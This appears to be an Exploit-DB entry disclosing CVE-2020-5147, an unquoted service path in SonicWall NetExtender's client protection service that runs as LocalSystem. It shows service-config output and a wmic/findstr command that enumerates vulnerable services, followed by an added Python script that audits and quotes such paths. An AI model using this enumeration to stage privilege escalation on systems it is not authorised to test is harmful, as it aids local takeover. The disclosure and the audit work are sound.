SonicWall NetExtender 10.2.0.300 – Unquoted Service Path

  • Author: shinnai
    Date: 2021-08-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50212/
  • # Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
    # Exploit Author: shinnai
    # Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
    # Version: 10.2.0.300
    # Tested On: Windows
    # CVE: CVE-2020-5147
    
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    Title: SonicWall NetExtender Windows client unquoted service path vulnerability
    Vers.: 10.2.0.300
    Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
    
    Advisory: 
    https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
    CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
    
    URLs:
    https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
    https://shinnai.altervista.org/exploits/SH-029-20210109.html
    
    Desc.:
    The SonicWall NetExtender Windows client is vulnerable to an unquoted 
    service path vulnerability, which allows a local attacker to gain 
    elevated privileges in the host operating system.
    This vulnerability impacts SonicWall NetExtender Windows client version 
    10.2.300 and earlier.
    
    Poc:
    
    C:\>sc qc sonicwall_client_protection_svc
    [SC] QueryServiceConfig OPERAZIONI RIUSCITE
    NOME_SERVIZIO: sonicwall_client_protection_svc
     TIPO: 10 WIN32_OWN_PROCESS
     TIPO_AVVIO: 2 AUTO_START
     CONTROLLO_ERRORE: 1 NORMAL
     NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe <-- Unquoted Service Path Vulnerability
     GRUPPO_ORDINE_CARICAMENTO :
     TAG : 0
     NOME_VISUALIZZATO : SonicWall Client Protection Service
     DIPENDENZE:
     SERVICE_START_NAME : LocalSystem
    C:\>
    
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
    
    C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
    SonicWall Client Protection Service    sonicwall_client_protection_svc    C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe    Auto
    
    C:\>
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
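
For auditing a fleet, the check that the `wmic | findstr` filter above approximates can be made exact by looking only at the executable portion of each service's binary path and producing the quoted value it should have. This is an added example, not part of the original advisory or SonicWall's code; the function names and every sample entry other than the SonicWall path are hypothetical.

```python
import re

# Splits an unquoted ImagePath into (executable, arguments): the executable is
# the shortest prefix ending in a binary extension followed by space or end.
_EXE_SPLIT = re.compile(r"^(.*?\.(?:exe|com|bat|cmd))(?=\s|$)(.*)$", re.IGNORECASE)


def audit_image_path(image_path):
    """Return the corrected (quoted) ImagePath if the value is an unquoted
    path with a space in its executable portion, otherwise None."""
    value = image_path.strip()
    if value.startswith('"'):
        return None                      # already quoted
    match = _EXE_SPLIT.match(value)
    if match is None:
        return None                      # no recognisable executable, e.g. drivers
    exe, args = match.groups()
    if " " not in exe:
        return None                      # spaces only in the arguments
    return f'"{exe}"{args}'


def audit_services(services):
    """Map service name -> corrected ImagePath for every flagged service."""
    findings = {}
    for name, image_path in services.items():
        fixed = audit_image_path(image_path)
        if fixed is not None:
            findings[name] = fixed
    return findings


# Constructed sample data: the first entry is the value shown in the sc qc
# output above; the others are made-up values covering the edge cases.
SAMPLE_SERVICES = {
    "sonicwall_client_protection_svc":
        r"C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe",
    "example_quoted": r'"C:\Program Files\Example\svc.exe" --run',
    "example_args_only": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "example_quoted_arg": r'C:\Program Files\Example\agent.exe --name "x"',
    "example_driver": r"\SystemRoot\System32\drivers\example.sys",
}

if __name__ == "__main__":
    for name, fixed in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path, should be {fixed}")
```

The `example_quoted_arg` entry is a case that a filter dropping every line containing a quote character would skip, because the quote sits in the arguments rather than around the path.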